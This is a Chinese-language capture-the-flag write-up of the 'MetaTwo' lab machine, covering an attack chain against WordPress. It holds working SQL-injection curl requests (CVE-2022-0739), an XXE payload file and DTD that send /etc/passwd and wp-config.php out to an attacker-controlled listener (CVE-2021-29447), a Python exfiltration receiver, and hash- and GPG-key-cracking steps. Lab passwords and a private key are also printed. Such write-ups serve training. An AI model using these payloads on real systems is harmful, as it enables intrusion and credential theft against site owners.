MetaTwo靶机实战：SQL注入到权限提升全解析

目标信息

• 靶机名称: MetaTwo
• 目标IP: metapress.htb
• 难度: Medium
• 攻击链: SQL注入 → SSH登录 → Passpie权限提升

网络架构图

攻击概述

本次攻击利用了以下漏洞：

1. CVE-2022-0739: WordPress插件SQL注入漏洞
2. CVE-2021-29447: WordPress XXE漏洞（备用）
3. Passpie密码管理器: 弱密码导致的权限提升

第一阶段：信息收集

1.1 端口扫描

nmap -T4 -p- 10.129.226.36

发现开放端口：

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

80/tcp open http

1.2 Web应用识别

访问 http://metapress.htb 发现运行WordPress CMS。

第二阶段：SQL注入攻击 (CVE-2022-0739)

2.1 漏洞描述

CVE-2022-0739是WordPress BookingPress插件中的一个SQL注入漏洞，影响版本1.0.10及以下。该漏洞存在于/wp-admin/admin-ajax.php端点的bookingpress_front_get_category动作中。

WordPress BookingPress插件存在SQL注入漏洞，允许未经身份验证的攻击者执行任意SQL查询。

2.2 WordPress数据库结构

WordPress用户密码哈希存储位置：

• 数据库名：blog
• 数据库表: wp_users
• 密码字段: user_pass
• 哈希格式: $P$B (phpass算法)
• 其他重要字段: user_login, user_email, user_nicename

2.3 漏洞利用

在bookingpress的分步向导表单中action的_wpnonce的值：6440be07bd

进行sql注入测试

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \--data 'action=bookingpress_front_get_category_services&_wpnonce=6440be07bd&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

获取数据库名：blog

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'   --data 'action=bookingpress_front_get_category_services&_wpnonce=6440be07bd&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,database(),1,2,3,4,5,6-- -'

获取表名

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'   --data 'action=bookingpress_front_get_category_services&_wpnonce=6440be07bd&category_id=33&total_service=-7502) UNION ALL SELECT table_name,table_schema,table_type,1,2,3,4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -'

wp_options
wp_term_taxonomy
wp_bookingpress_servicesmeta
wp_commentmeta
wp_users
wp_bookingpress_customers_meta
wp_bookingpress_settings
wp_bookingpress_appointment_bookings
wp_bookingpress_customize_settings
wp_bookingpress_debug_payment_log
wp_bookingpress_services
wp_termmeta
wp_links
wp_bookingpress_entries
wp_bookingpress_categories
wp_bookingpress_customers
wp_bookingpress_notifications
wp_usermeta
wp_terms
wp_bookingpress_default_daysoff
wp_comments
wp_bookingpress_default_workhours
wp_postmeta
wp_bookingpress_form_fields
wp_bookingpress_payment_logs
wp_posts
wp_term_relationships

获取wp_users表结构

无回显，应该是有waf

找到wp_users的官方字段说明

获取wp_users表的数据

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'   --data 'action=bookingpress_front_get_category_services&_wpnonce=6440be07bd&category_id=33&total_service=-7502) UNION ALL SELECT user_login,user_pass,user_email,1,2,3,4,5,6 FROM wp_users-- -'

获取到admin与manager的密码哈希

提取的bookingpress_service_id:

admin：$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.

manager：$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

第三阶段：密码破解与SSH访问

3.1 密码哈希破解

使用hashcat或john破解WordPress密码哈希：

hashcat -m 400 hash.txt /usr/share/wordlists/rockyou.txt

只能破解出一个

$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar

登录后台

3.2 SSH登录尝试

经过测试发现可以使用以下凭据SSH登录：

• 用户名: jnelson
• 密码: Cb4_JmWM8zUZWMu@Ys

ssh jnelson@metapress.htb

3.3 获取用户Flag

jnelson@metapress:~$ cat user.txt
[用户flag内容]

第四阶段：XXE攻击（CVE-2021-29447)

4.1 漏洞描述

CVE-2021-29447 是WordPress中的一个XXE（XML External Entity）漏洞，存在于媒体文件处理功能中。

漏洞详情：

• 漏洞类型：XXE (XML External Entity Injection)
• 影响版本：WordPress 5.6-5.7
• CVSS评分：6.5 (中危)
• 漏洞位置：wp-includes/ID3/getid3.php 中的MP3文件ID3标签解析功能

漏洞原理：
当用户上传包含恶意ID3标签的MP3文件时，WordPress会使用PHP的XML解析器处理ID3v2标签中的歌词信息。攻击者可以在XML内容中注入外部实体引用，导致服务器读取任意文件或发起SSRF攻击。

触发条件：

1. 攻击者具有上传媒体文件的权限
2. 上传的wav文件包含恶意的ID3v2标签
3. 服务器启用了PHP的libxml扩展且未禁用外部实体加载

漏洞利用方案

利用步骤：

步骤1：创建恶意wav文件

# 创建一个包含恶意XXE payload的MP3文件
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.9:8001/dedsec.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

步骤2：创建外部DTD文件 (dedsec.dtd)

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://10.10.16.10:8001/?p=%file;'>" >

步骤3：开启php服务

php -S 0.0.0.0:8001

步骤四：上传WAV文件，等待回显

[Thu Oct 30 15:32:13 2025] 10.129.226.36:55582 [200]: /dedsec.dtd
[Thu Oct 30 15:32:16 2025] 10.129.226.36:55584 [404]: /?p=jVRNj5swEL3nV3BspUSGkGSDj22lXjaVuum9MuAFusamNiShv74zY8gmgu5WHtB8vHkezxisMS2/8BCWRZX5d1pplgpXLnIha6MBEcEaDNY5yxxAXjWmjTJFpRfovfA1LIrPg1zvABTDQo3l8jQL0hmgNny33cYbTiYbSRmai0LUEpm2fBdybxDPjXpHWQssbsejNUeVnYRlmchKycic4FUD8AdYoBDYNcYoppp8lrxSAN/DIpUSvDbBannGuhNYpN6Qe3uS0XUZFhOFKGTc5Hh7ktNYc+kxKUbx1j8mcj6fV7loBY4lRrk6aBuw5mYtspcOq4LxgAwmJXh97iCqcnjh4j3KAdpT6SJ4BGdwEFoU0noCgk2zK4t3Ik5QQIc52E4zr03AhRYttnkToXxFK/jUFasn2Rjb4r7H3rWyDj6IvK70x3HnlPnMmbmZ1OTYUn8n/XtwAkjLC5Qt9VzlP0XT0gDDIe29BEe15Sst27OxL5QLH2G45kMk+OYjQ+NqoFkul74jA+QNWiudUSdJtGt44ivtk4/Y/yCDz8zB1mnniAfuWZi8fzBX5gTfXDtBu6B7iv6lpXL+DxSGoX8NPiqwNLVkI+j1vzUes62gRv8nSZKEnvGcPyAEN0BnpTW6+iPaChneaFlmrMy7uiGuPT0j12cIBV8ghvd3rlG9+63oDFseRRE/9Mfvj8FR2rHPdy3DzGehnMRP+LltfLt2d+0aI9O9wE34hyve2RND7xT7Fw== - No such file or directory

步骤五：解码

使用php进行zlib和base64解码

<?php echo zlib_decode(base64_decode('hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X')); ?>

步骤六：查看其他文件

修改deddec.dtd，查看/var/www/html/wp-config.php的内容

	<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php"><!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://10.10.16.10:8001/?p=%file;'>" >

再次上传payload.wav，

并未回显，查看nginx配置文件的路径

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/nginx/nginx.conf">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://10.10.16.10:8001/?p=%file;'>" >

include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;

再次查看/etc/nginx/sites-enabled/default的内容：

找到网站根目录：

/var/www/metapress.htb/blog

再次查看wp-config文件

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
<!ENTITY % init "<!ENTITY &#37; trick SYSTEM 'http://10.10.16.10:8001/?p=%file;'>" >

成功获取了wp-config.php文件！从文件中我们可以看到重要的信息：

数据库凭据：

• 数据库名: blog
• 用户名: blog
• 密码: 635Aq@TdqrCwXFUZ
• 主机: localhost

FTP凭据：

• FTP用户: 10.129.226.36
• FTP密码: 9NYS_ii@FyL_p5M2NvJ
• FTP主机: ftp.metapress.htb
• FTP基础目录: blog/

PS.写个脚本自动监听解密数据

#!/usr/bin/env python3
"""
简单的XXE监听服务器
用于接收CVE-2021-29447攻击的数据回传
"""import base64
import zlib
from http.server import HTTPServer, BaseHTTPRequestHandler
import urllib.parse
import reclass XXEListener(BaseHTTPRequestHandler):def do_GET(self):print(f"[+] 收到GET请求: {self.path}")if self.path == '/dedsec.dtd':# 提供DTD文件try:with open('dedsec.dtd', 'r') as f:dtd_content = f.read()self.send_response(200)self.send_header('Content-Type', 'application/xml-dtd')self.send_header('Content-Length', str(len(dtd_content)))self.end_headers()self.wfile.write(dtd_content.encode())print("[+] 已发送dedsec.dtd文件")except Exception as e:print(f"[-] 发送DTD文件失败: {e}")self.send_response(404)self.end_headers()elif self.path.startswith('/?p='):# 接收泄露的数据encoded_data = self.path[4:]  # 去掉 '/?p='print(f"[+] 收到泄露数据长度: {len(encoded_data)} 字符")print(f"[+] 数据预览: {encoded_data[:100]}...")try:# URL解码url_decoded = urllib.parse.unquote(encoded_data)print(f"[+] URL解码后长度: {len(url_decoded)} 字符")# Base64解码decoded_data = base64.b64decode(url_decoded)print(f"[+] Base64解码后长度: {len(decoded_data)} 字节")# 尝试多种zlib解压缩方法decompressed_data = Nonetry:# 方法1: 标准zlib解压缩decompressed_data = zlib.decompress(decoded_data)print("[+] 使用标准zlib解压缩成功")except:try:# 方法2: 使用-15窗口位 (raw deflate)decompressed_data = zlib.decompress(decoded_data, -15)print("[+] 使用raw deflate解压缩成功")except:try:# 方法3: 使用15窗口位 (gzip格式)decompressed_data = zlib.decompress(decoded_data, 15)print("[+] 使用gzip格式解压缩成功")except Exception as e:print(f"[-] 所有解压缩方法都失败: {e}")# 如果解压缩失败，尝试直接解码为文本try:decompressed_data = decoded_dataprint("[+] 直接使用base64解码的数据")except:returnprint("\n" + "="*80)print("成功获取文件内容:")print("="*80)content = decompressed_data.decode('utf-8')print(content)print("="*80)# 保存到文件if 'wp-config' in self.path or 'DB_NAME' in content:filename = 'wp-config.php'elif 'passwd' in self.path or 'root:' in content:filename = 'passwd.txt'else:filename = 'extracted_file.txt'with open(filename, 'w', encoding='utf-8') as f:f.write(content)print(f"[+] 文件已保存为: {filename}")# 如果是wp-config.php，提取数据库凭据if 'DB_NAME' in content:print("\n[+] 提取数据库凭据:")db_name = re.search(r"define\s*\(\s*['\"]DB_NAME['\"],\s*['\"]([^'\"]+)['\"]", content)db_user = re.search(r"define\s*\(\s*['\"]DB_USER['\"],\s*['\"]([^'\"]+)['\"]", content)db_pass = re.search(r"define\s*\(\s*['\"]DB_PASSWORD['\"],\s*['\"]([^'\"]+)['\"]", content)db_host = re.search(r"define\s*\(\s*['\"]DB_HOST['\"],\s*['\"]([^'\"]+)['\"]", content)if all([db_name, db_user, db_pass, db_host]):print(f"    数据库名: {db_name.group(1)}")print(f"    用户名: {db_user.group(1)}")print(f"    密码: {db_pass.group(1)}")print(f"    主机: {db_host.group(1)}")print("\n[+] XXE攻击成功完成!")except Exception as e:print(f"[-] 解码数据失败: {e}")print(f"[*] 原始数据: {encoded_data}")self.send_response(200)self.end_headers()self.wfile.write(b'OK')else:self.send_response(404)self.end_headers()def log_message(self, format, *args):# 禁用默认日志passdef main():server_address = ('10.10.16.10', 8001)print("="*60)print("XXE监听服务器")print("="*60)print(f"监听地址: {server_address[0]}:{server_address[1]}")print("等待XXE数据回传...")print("按 Ctrl+C 停止服务器")print("="*60)try:httpd = HTTPServer(server_address, XXEListener)httpd.serve_forever()except KeyboardInterrupt:print("\n[*] 服务器已停止")except Exception as e:print(f"[-] 服务器启动失败: {e}")if __name__ == "__main__":main()

步骤七：登录ftp查看

进入ftp后发现mail目录下有个send_emaill.php

下载后打开发现邮箱信息泄露

<?php
/** This script will be used to send an email to all our users when ready for launch
*/use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;require 'PHPMailer/src/Exception.php';
require 'PHPMailer/src/PHPMailer.php';
require 'PHPMailer/src/SMTP.php';$mail = new PHPMailer(true);$mail->SMTPDebug = 3;
$mail->isSMTP();$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;$mail->From = "jnelson@metapress.htb";
$mail->FromName = "James Nelson";$mail->addAddress("info@metapress.htb");$mail->isHTML(true);$mail->Subject = "Startup";
$mail->Body = "<i>We just started our new blog metapress.htb!</i>";try {$mail->send();echo "Message has been sent successfully";
} catch (Exception $e) {echo "Mailer Error: " . $mail->ErrorInfo;
}

根据提示，尝试SSH登录

步骤八：SSH登录

ssh jnelson@10.129.226.36
Cb4_JmWM8zUZWMu@Ys

登陆成功

拿到第一个flag：f365da7f511570b3f2d42c144f11f718

第五阶段：权限提升 - Passpie密码管理器

5.1 系统枚举

登录后发现用户目录下存在 .passpie 目录：

4.2 Passpie信息收集

4.3 GPG密钥提取

jnelson@meta2:~$ cat .passpie/.keys
-----BEGIN PGP PUBLIC KEY BLOCK-----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
fo6KI+w2uXLaw+bIT1XZurDN
=dqsF
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----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
=7Uo6
-----END PGP PRIVATE KEY BLOCK-----

4.4 Passpie主密码破解

提取私钥到单独文件内

对私钥生成一个哈希值

gpg2john private_key_clean.asc > hash

执行破解攻击

john -w=/usr/share/wordlists/rockyou.txt hash

4.5 破解结果

成功破解passpie主密码：blink182

第五阶段：Root权限获取

5.1 使用passpie查看密码

passpie list

5.2 获取Root密码

jnelson@meta2:~$ passpie export pass
Passphrase:blink182

5.3查看导出数据

jnelson@meta2:~$ ls
pass  user.txtjnelson@meta2:~$ cat pass
credentials:
- comment: ''fullname: root@sshlogin: rootmodified: 2022-06-26 08:58:15.621572name: sshpassword: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''fullname: jnelson@sshlogin: jnelsonmodified: 2022-06-26 08:58:15.514422name: sshpassword: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0

最终密码：

root:p7qfAZt4_A1xo_0x
jnelson:Cb4_JmWM8zUZWMu@Ys

5.3 系统完全控制

切换到root用户，查看基本信息，获取flag：3cfc24e931dee1c39af4afb1495a305b